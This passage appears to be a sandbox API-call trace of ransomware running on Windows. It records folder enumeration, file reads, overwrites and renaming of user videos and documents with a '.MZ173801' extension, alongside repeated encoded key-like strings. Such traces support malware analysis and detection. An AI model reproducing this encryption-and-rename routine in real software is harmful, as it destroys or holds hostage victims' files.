lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.084] GetCurrentThreadId () returned 0x1358 [0121.084] GetCurrentThreadId () returned 0x1358 [0121.084] GetCurrentThreadId () returned 0x1358 [0121.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.085] GetCurrentThreadId () returned 0x1358 [0121.085] GetCurrentThreadId () returned 0x1358 [0121.085] GetCurrentThreadId () returned 0x1358 [0121.085] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\OBs8J_Fu4-ilYu.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\obs8j_fu4-ilyu.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.085] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0121.085] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.085] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x1855 [0121.085] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.085] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1855, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x1855, lpOverlapped=0x0) returned 1 [0121.086] CloseHandle (hObject=0x3d0) returned 1 [0121.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\OBs8J_Fu4-ilYu.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\obs8j_fu4-ilyu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.087] WriteFile (in: hFile=0x3d0, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1855, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f6f0*=0x1855, lpOverlapped=0x0) returned 1 [0121.089] CloseHandle (hObject=0x3d0) returned 1 [0121.090] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\OBs8J_Fu4-ilYu.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\obs8j_fu4-ilyu.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\OBs8J_Fu4-ilYu.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\obs8j_fu4-ilyu.flv.mz173801")) returned 1 [0121.091] GetCurrentThreadId () returned 0x1358 [0121.091] GetCurrentThreadId () returned 0x1358 [0121.091] GetCurrentThreadId () returned 0x1358 [0121.091] GetCurrentThreadId () returned 0x1358 [0121.091] GetCurrentThreadId () returned 0x1358 [0121.091] GetCurrentThreadId () returned 0x1358 [0121.091] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd34e5a0, ftCreationTime.dwHighDateTime=0x1d5f0ca, ftLastAccessTime.dwLowDateTime=0xa590e870, ftLastAccessTime.dwHighDateTime=0x1d5e851, ftLastWriteTime.dwLowDateTime=0xa590e870, ftLastWriteTime.dwHighDateTime=0x1d5e851, nFileSizeHigh=0x0, nFileSizeLow=0x1855, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="OBs8J_Fu4-ilYu.flv", cAlternateFileName="OBS8J_~1.FLV")) returned 0 [0121.091] GetLastError () returned 0x12 [0121.091] FindClose (in: hFindFile=0xa1bab8 | out: hFindFile=0xa1bab8) returned 1 [0121.091] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0xa97210dd, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa97210dd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bd20 [0121.091] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0121.091] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.091] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0xa97210dd, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa97210dd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0121.091] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.091] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.091] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f052b0, ftCreationTime.dwHighDateTime=0x1d5e17d, ftLastAccessTime.dwLowDateTime=0xfb442ee0, ftLastAccessTime.dwHighDateTime=0x1d5e8d7, ftLastWriteTime.dwLowDateTime=0xa96fb000, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x635c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="JRD90ylj1Dg_Ngx4FKM.flv.MZ173801", cAlternateFileName="JRD90Y~1.MZ1")) returned 1 [0121.091] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.092] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.092] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630a5ba0, ftCreationTime.dwHighDateTime=0x1d5e336, ftLastAccessTime.dwLowDateTime=0xcc8a0140, ftLastAccessTime.dwHighDateTime=0x1d5ed84, ftLastWriteTime.dwLowDateTime=0xa97210dd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x18422, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="o9cam2.swf.MZ173801", cAlternateFileName="O9CAM2~1.MZ1")) returned 1 [0121.092] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.092] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.092] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd34e5a0, ftCreationTime.dwHighDateTime=0x1d5f0ca, ftLastAccessTime.dwLowDateTime=0xa590e870, ftLastAccessTime.dwHighDateTime=0x1d5e851, ftLastWriteTime.dwLowDateTime=0xa97210dd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1855, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="OBs8J_Fu4-ilYu.flv.MZ173801", cAlternateFileName="OBS8J_~1.MZ1")) returned 1 [0121.092] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.140] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.140] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd34e5a0, ftCreationTime.dwHighDateTime=0x1d5f0ca, ftLastAccessTime.dwLowDateTime=0xa590e870, ftLastAccessTime.dwHighDateTime=0x1d5e851, ftLastWriteTime.dwLowDateTime=0xa97210dd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1855, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="OBs8J_Fu4-ilYu.flv.MZ173801", cAlternateFileName="OBS8J_~1.MZ1")) returned 0 [0121.140] GetLastError () returned 0x12 [0121.140] FindClose (in: hFindFile=0xa1bd20 | out: hFindFile=0xa1bd20) returned 1 [0121.140] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x1a33e180, ftLastAccessTime.dwHighDateTime=0x1d5e890, ftLastWriteTime.dwLowDateTime=0x1a33e180, ftLastWriteTime.dwHighDateTime=0x1d5e890, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_C-ZbiqZ3CWgavc2", cAlternateFileName="_C-ZBI~1")) returned 0 [0121.140] GetLastError () returned 0x12 [0121.140] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0121.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=5, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 1 [0121.140] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0121.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=5, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 1 [0121.140] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe514c648, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe514c648, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0121.141] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe514c648, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe514c648, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.141] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe19c1a30, ftCreationTime.dwHighDateTime=0x1d58148, ftLastAccessTime.dwLowDateTime=0x6eed11c0, ftLastAccessTime.dwHighDateTime=0x1d586c4, ftLastWriteTime.dwLowDateTime=0x6eed11c0, ftLastWriteTime.dwHighDateTime=0x1d586c4, nFileSizeHigh=0x0, nFileSizeLow=0x17950, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="14yXf75kP-7umnG 4Xe.xlsx", cAlternateFileName="14YXF7~1.XLS")) returned 1 [0121.141] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0121.141] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.141] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\14yXf75kP-7umnG 4Xe.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\14yxf75kp-7umng 4xe.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe19c1a30, ftCreationTime.dwHighDateTime=0x1d58148, ftLastAccessTime.dwLowDateTime=0x6eed11c0, ftLastAccessTime.dwHighDateTime=0x1d586c4, ftLastWriteTime.dwLowDateTime=0x6eed11c0, ftLastWriteTime.dwHighDateTime=0x1d586c4, nFileSizeHigh=0x0, nFileSizeLow=0x17950)) returned 1 [0121.141] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.141] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.142] GetCurrentThreadId () returned 0x1358 [0121.142] GetCurrentThreadId () returned 0x1358 [0121.142] GetCurrentThreadId () returned 0x1358 [0121.142] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.142] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 